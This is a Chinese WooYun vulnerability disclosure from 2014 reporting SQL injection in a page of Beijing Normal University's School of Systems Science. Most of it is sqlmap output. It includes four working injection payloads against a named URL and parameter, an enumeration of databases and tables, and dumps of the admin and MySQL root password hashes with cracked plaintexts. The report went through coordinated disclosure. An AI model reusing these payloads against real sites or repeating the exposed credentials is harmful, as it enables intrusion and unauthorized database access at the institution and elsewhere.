当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056627

漏洞标题:北京师范大学系统科学学院存在sql注入漏洞

相关厂商:北京师范大学

漏洞作者: bitcoin

提交时间:2014-04-11 11:02

修复时间:2014-05-26 11:02

公开时间:2014-05-26 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-11: 细节已通知厂商并且等待厂商处理中
2014-04-11: 厂商已经确认,细节仅向厂商公开
2014-04-21: 细节向核心白帽子及相关领域专家公开
2014-05-01: 细节向普通白帽子公开
2014-05-11: 细节向实习白帽子公开
2014-05-26: 细节向公众公开

简要描述:

北京师范大学系统科学学院存在sql注入漏洞

详细说明:

注入点:
http://sss.bnu.edu.cn/mainview.php?cid=1&id=16
对参数id过滤不严,导致注入
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1&id=16 AND 7258=7258
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cid=1&id=16 AND (SELECT 9168 FROM(SELECT COUNT(*),CONCAT(0x7163676d
71,(SELECT (CASE WHEN (9168=9168) THEN 1 ELSE 0 END)),0x716e646971,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: cid=1&id=-6570 UNION ALL SELECT NULL,NULL,CONCAT(0x7163676d71,0x756
44867466f68497153,0x716e646971),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=1&id=16 AND SLEEP(5)
---
[10:09:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[10:09:18] [INFO] fetching database names
[10:09:19] [INFO] the SQL query used returns 11 entries
[10:09:19] [INFO] retrieved: "information_schema"
[10:09:20] [INFO] retrieved: "23916593"
[10:09:20] [INFO] retrieved: "chnfontdb"
[10:09:21] [INFO] retrieved: "gallery3"
[10:09:21] [INFO] retrieved: "iesdbnew"
[10:09:21] [INFO] retrieved: "mpmdb"
[10:09:22] [INFO] retrieved: "mysql"
[10:09:22] [INFO] retrieved: "test"
[10:09:23] [INFO] retrieved: "ultrax"
[10:09:23] [INFO] retrieved: "wanfang"
[10:09:24] [INFO] retrieved: "wordpress"
available databases [11]:
[*] 23916593
[*] chnfontdb
[*] gallery3
[*] iesdbnew
[*] information_schema
[*] mpmdb
[*] mysql
[*] test
[*] ultrax
[*] wanfang
[*] wordpress
Database: mpmdb
[18 tables]
+---------------+
| admin |
| articles |
| articletype |
| cmstable |
| degreetable |
| nsftable |
| papertable |
| picnews |
| prjtable |
| projectcat |
| projecttable |
| stafftable |
| studenttable |
| titletable |
| treatisetable |
| tutortable |
| visitcount |
| xuanke |
+---------------+
Database: mpmdb
Table: admin
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| password | varchar(50) |
| r_id | int(11) |
| status | tinyint(4) |
| username | varchar(50) |
+----------+-------------+
Database: mpmdb
Table: admin
[1 entry]
+----------+-------------------------------------------+
| username | password |
+----------+-------------------------------------------+
| admin | 96e79218965eb72c92a549dd5a330112 (111111) |
+----------+-------------------------------------------+
Database: mysql
[23 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
Database: mysql
Table: user
[39 columns]
+-----------------------+-----------------------------------+
| Column | Type |
+-----------------------+-----------------------------------+
| User | char(16) |
| Alter_priv | enum('N','Y') |
| Alter_routine_priv | enum('N','Y') |
| Create_priv | enum('N','Y') |
| Create_routine_priv | enum('N','Y') |
| Create_tmp_table_priv | enum('N','Y') |
| Create_user_priv | enum('N','Y') |
| Create_view_priv | enum('N','Y') |
| Delete_priv | enum('N','Y') |
| Drop_priv | enum('N','Y') |
| Event_priv | enum('N','Y') |
| Execute_priv | enum('N','Y') |
| File_priv | enum('N','Y') |
| Grant_priv | enum('N','Y') |
| Host | char(60) |
| Index_priv | enum('N','Y') |
| Insert_priv | enum('N','Y') |
| Lock_tables_priv | enum('N','Y') |
| max_connections | int(11) unsigned |
| max_questions | int(11) unsigned |
| max_updates | int(11) unsigned |
| max_user_connections | int(11) unsigned |
| Password | char(41) |
| Process_priv | enum('N','Y') |
| References_priv | enum('N','Y') |
| Reload_priv | enum('N','Y') |
| Repl_client_priv | enum('N','Y') |
| Repl_slave_priv | enum('N','Y') |
| Select_priv | enum('N','Y') |
| Show_db_priv | enum('N','Y') |
| Show_view_priv | enum('N','Y') |
| Shutdown_priv | enum('N','Y') |
| ssl_cipher | blob |
| ssl_type | enum('','ANY','X509','SPECIFIED') |
| Super_priv | enum('N','Y') |
| Trigger_priv | enum('N','Y') |
| Update_priv | enum('N','Y') |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+-----------------------------------+
Database: mysql
Table: user
[6 entries]
+---------+----------------------------------------------------+
| User | Password |
+---------+----------------------------------------------------+
| <blank> | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| <blank> | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456) |
+---------+----------------------------------------------------+

漏洞证明:

Database: mpmdb
Table: admin
[1 entry]
+----------+-------------------------------------------+
| username | password |
+----------+-------------------------------------------+
| admin | 96e79218965eb72c92a549dd5a330112 (111111) |
+----------+-------------------------------------------+
Database: mysql
Table: user
[6 entries]
+---------+----------------------------------------------------+
| User | Password |
+---------+----------------------------------------------------+
| <blank> | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| <blank> | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *A16C6580FB17AE4AEA3F1ABC95A60D56640E574D |
| root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456) |
+---------+----------------------------------------------------+

修复方案:

过滤,有礼物不?

版权声明:转载请注明来源 bitcoin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-04-11 11:35

厂商回复:

已通知北师大处理

最新状态:

暂无